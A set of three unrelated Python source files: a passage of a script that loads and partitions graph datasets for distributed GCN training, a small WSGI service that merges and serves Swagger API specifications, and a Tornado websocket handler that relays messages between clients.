row_start = int(row_block*rank_row)
row_end = int(row_block*(rank_row+1))
if row_end > node_count:
row_end = node_count
h = H[row_start:row_end, :]
print("inputs_part: rank = %d" % rank, h.shape)
return h
def parse_index_file(filename):
index = []
for line in open(filename):
index.append(int(line.strip()))
return index
def normalize(mx):
"""Row-normalize sparse matrix"""
rowsum = np.array(mx.sum(1))
r_inv = np.power(rowsum, -1).flatten()
r_inv[np.isinf(r_inv)] = 0.
r_mat_inv = sp.diags(r_inv)
mx = r_mat_inv.dot(mx)
return mx
def check_sparsity(adj):
if args.size == -1:
return
adj = adj.tocoo()
node_count = adj.shape[0]
block_num = args.size//args.replication
p = math.ceil(float(node_count)/(args.size//args.replication))
starts = list(range(0, node_count, p))
ends = list(range(p, node_count, p))+[node_count]
sparsity = np.zeros(shape=(block_num, block_num), dtype=int)
for i in range(block_num):
for j in range(block_num):
sparsity[i, j] = np.where((adj.row >= starts[i]) & (adj.row < ends[i]) & (
adj.col >= starts[j]) & (adj.col < ends[j]))[0].shape[0]
print(sparsity)
def load_data(args):
dataset = args.dataset
data_dir = './tests/test_DistGCN/datasets/%s/' % dataset
# ---load data---
if dataset == "Reddit":
adj = sp.load_npz(data_dir+'raw/reddit_graph.npz')
inputs = np.load(data_dir+'raw/reddit_data.npz')
x, y = inputs['feature'], inputs['label']
elif dataset == 'Proteins':
adj = sp.load_npz(data_dir+'protein_adj.npz')
y = np.load(data_dir+'protein_labels.npy')
y = y.astype(int)
np.random.seed(123)
bounds = np.sqrt(6.0 / (132534 + 602))
x = np.random.uniform(low=-bounds, high=bounds,
size=[132534, 602]).astype(np.float32)
elif dataset == 'Arch':
adj = sp.load_npz(data_dir+'arch_adj.npz')
y = np.random.randint(10, size=adj.shape[0])
np.random.seed(123)
bounds = np.sqrt(6.0 / (adj.shape[0] + 602))
x = np.random.uniform(low=-bounds, high=bounds,
size=[adj.shape[0], 602]).astype(np.float32)
elif dataset == 'Products':
adj = sp.load_npz(data_dir+'products_adj.npz')
x = np.load(data_dir+'products_feat.npy')
y = np.load(data_dir+'products_label.npy').astype(np.int)
elif dataset == 'Youtube':
adj = np.load(data_dir+'youtube_coo.npy', allow_pickle=True).item()
np.random.seed(123)
bounds = np.sqrt(6.0 / (adj.shape[0] + 602))
x = np.random.uniform(low=-bounds, high=bounds,
size=[adj.shape[0], 602]).astype(np.float32)
y = np.load(data_dir+'youtube_label.npy')
graph = Graph(edge_index=np.vstack(
[adj.row, adj.col]), num_nodes=x.shape[0])
# ---preprocess graph---
graph.add_self_loop()
normed_val = graph.gcn_norm(True)
node_count = graph.num_nodes
# ---construct adj,x,y---
edge_index = graph.edge_index
adj = sp.coo_matrix(
(normed_val, (edge_index[0], edge_index[1])), shape=(node_count, node_count))
# ---check block sparsity---
print('Sparsity before reordering:')
check_sparsity(adj)
if args.shuffle == 1:
print("Shuffle the graph...")
order = np.random.permutation(node_count)
adj = adj.tocsr()[:, order][order]
x = x[order, :]
y = y[order]
print('Sparsity after Shuffle:')
check_sparsity(adj)
print('node_count = %d, num_features = %d, num_classes = %d, edge_count = %d' % (
adj.shape[0], x.shape[1], np.max(y)+1, len(adj.data)))
return adj, x, y
def prepare_data(args, prepare_all_data=False):
dataset, replication, size = args.dataset, args.replication, args.size
print("Preparing data...")
adj_all, input_all, label_all = load_data(args)
if prepare_all_data:
size_set = [1, 2, 4, 8, 4, 8]
replication_set = [1, 1, 1, 1, 2, 2]
else:
size_set = [size]
replication_set = [replication]
for i in range(len(size_set)):
replication, size = replication_set[i], size_set[i]
print("size=%d, replication=%s, dataset=%s" %
(size, replication, dataset))
if size == 1: # whole graph for single GPU
replication = 1
dir_name = "./tests/test_DistGCN/data_GCN15d/%s_whole_graph/" % dataset
if not os.path.exists(dir_name):
os.makedirs(dir_name)
adj_all = adj_all.tocoo()
sp.save_npz(dir_name+"adj_whole.npz", adj_all)
print("adj_whole: ", adj_all.shape, len(adj_all.data))
np.save(dir_name+"input_whole.npy", input_all)
print("inputs_all: ", input_all.shape)
np.save(dir_name+"label_whole.npy", label_all)
print("labels_all: ", label_all.shape)
print("Data preparation done!")
else: # partitioned graph for multiple GPU
dir_name = "./tests/test_DistGCN/data_GCN15d/%s_size_%d_rep_%d/" % (
dataset, size, replication)
if not os.path.exists(dir_name):
os.makedirs(dir_name)
for rank in range(size):
input_part = get_inputs(input_all, replication, rank, size)
label_part = get_inputs(
label_all.reshape(-1, 1), replication, rank, size).reshape(-1)
np.save(dir_name+"input"+str(rank)+".npy", input_part)
np.save(dir_name+"label"+str(rank)+".npy", label_part)
print("Done inputs and labels!")
get_adj_matrix_all(adj_all, replication, size, dir_name)
print("Data preparation done!")
def get_dataset(args):
if args.dataset in ['Reddit', 'reddit']:
args.dataset = 'Reddit'
elif args.dataset in ['Proteins', 'proteins']:
args.dataset = 'Proteins'
elif args.dataset in ['Arch', 'arch']:
args.dataset = 'Arch'
elif args.dataset in ['Products', 'products']:
args.dataset = 'Products'
elif args.dataset in ['All', 'all']:
args.dataset = 'All'
else:
print(
"Dataset should be in ['Reddit','Proteins','Arch','Products','All']")
assert False
parser = argparse.ArgumentParser()
parser.add_argument('--replication', type=int, default=1,
help='Replication of distGCN1.5D.')
parser.add_argument('--size', type=int, default=8,
help='Number of devices')
parser.add_argument('--dataset', type=str, default="Reddit",
help='Choose dataset [Reddit, Proteins, Arch, Products].')
parser.add_argument('--shuffle', type=int, default=1,
help='Whether to shuffle the graph before algorithm.')
args = parser.parse_args()
get_dataset(args)
if args.size == -1:
prepare_data(args, True)
elif args.dataset == 'All':
dataset = ['Reddit', 'Proteins', 'Arch', 'Products']
for i in range(len(dataset)):
args.dataset = dataset[i]
prepare_data(args)
else:
prepare_data(args)
|
# -*- coding: utf-8 -*-
#
# Copyright 2017 - Swiss Data Science Center (SDSC)
# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and
# Eidgenössische Technische Hochschule Zürich (ETHZ).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Combine and serve Swagger specifications."""
import os
import json
import requests
from werkzeug.wrappers import Request, Response
SERVICES = [
service.strip()
for service in os.environ.get(
'SERVICES', '').split(',')
]
WSGI_NUM_PROXIES = int(os.environ.get('WSGI_NUM_PROXIES', 0))
def merge(*specs):
"""Merge paths and definitions from given specifications."""
composed = {
'definitions': {},
'paths': {},
'schemes': [],
'securityDefinitions': {},
'tags': [],
}
for definition in specs:
# combine only v2 schemas
composed.setdefault('swagger', definition['swagger'])
assert composed['swagger'] == definition['swagger']
# extend tags
composed['tags'].extend(definition.get('tags', []))
# schemes
composed['schemes'] = list(
set(composed['schemes'] + definition.get('schemes', [])))
# combines paths
for key, path in definition['paths'].items():
# FIXME temporary workaround for trailing slashes
if key.endswith('/'):
key = key.rstrip('/')
composed['paths'][definition['basePath'] + key] = path
# combines definitions
for key, defs in definition.get('definitions', {}).items():
assert key not in composed['definitions']
composed['definitions'][key] = defs
for key, defs in definition.get('securityDefinitions', {}).items():
if key in composed['securityDefinitions']:
security_defs = composed['securityDefinitions'][key]
same_keys = ('authorizationUrl', 'type', 'flow')
for check_key in same_keys:
assert security_defs[check_key] == defs[
check_key], check_key
composed['securityDefinitions'][key]['scopes'].update(
**defs['scopes'])
else:
composed['securityDefinitions'][key] = defs
return composed
def swagger(endpoint, *services):
"""Return merged specification."""
specs = (requests.get(service).json() for service in services)
spec = merge(*specs)
spec['host'] = endpoint
# TODO add title and other spec details
return spec
def application(environ, start_response):
"""Simple swagger serving app."""
request = Request(environ)
api_root_url = os.environ.get('API_ROOT_URL', request.host_url).rstrip('/')
services = [
'/'.join((api_root_url, service, 'swagger.json'))
for service in SERVICES
]
text = json.dumps(swagger(request.host, *services))
response = Response(text, mimetype='application/json')
return response(environ, start_response)
if WSGI_NUM_PROXIES:
from werkzeug.contrib.fixers import ProxyFix
application = ProxyFix(application, num_proxies=WSGI_NUM_PROXIES)
if __name__ == '__main__':
api_root_url = os.environ.get('API_ROOT_URL', 'http://localhost/api').rstrip('/')
services = [
'/'.join((api_root_url, service, 'swagger.json'))
for service in SERVICES
]
print(json.dumps(swagger(api_root_url, *services)))
|
import tornado.websocket
import json
import datetime
from system.log import log
from system.webserver import Webserver
from game.player import Player
class WebsocketRTC(tornado.websocket.WebSocketHandler):
websocket_send_data = []
websocket_clients = []
def websocket_send(client,data,binary=False):
WebsocketRTC.websocket_send_data.append([client,data,binary])
Webserver.main_loop.add_callback(WebsocketRTC.send_to_socket)
def send_to_socket():
client,data,binary = WebsocketRTC.websocket_send_data.pop(0)
if len(WebsocketRTC.websocket_clients)>0:
if client == True:
for c in WebsocketRTC.websocket_clients:
c.write_message(data,binary)
else:
client.write_message(data,binary)
else:
log.warn("Webserver: send_to_socket: message dropped: no clients!")
def write_all_but_me(self,message):
for c in WebsocketRTC.websocket_clients:
if c is not self:
c.write_message(message)
def open(self):
log.debug("WebSocketRTC opened")
WebsocketRTC.websocket_clients.append(self)
#ans = {
# "cmd": "version"
# }
#self.write_message(json.dumps(ans)) # hier ok!
#Websocket.websocket_send(self,json.dumps(ans),False)
def on_message(self, message):
# process json messages
jsonmsg = json.loads(message)
log.debug("Websocket: received message: "+str(jsonmsg))
self.write_all_but_me(message)
#if jsonmsg['cmd']=='ping':
# ans = {
# "cmd": "pong",
# }
# self.write_message(json.dumps(ans))
#elif jsonmsg['cmd']=='user':
# self.player.parse_user_command(jsonmsg['data'])
def on_close(self):
log.debug("WebSocketRTC closed")
WebsocketRTC.websocket_clients.remove(self)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.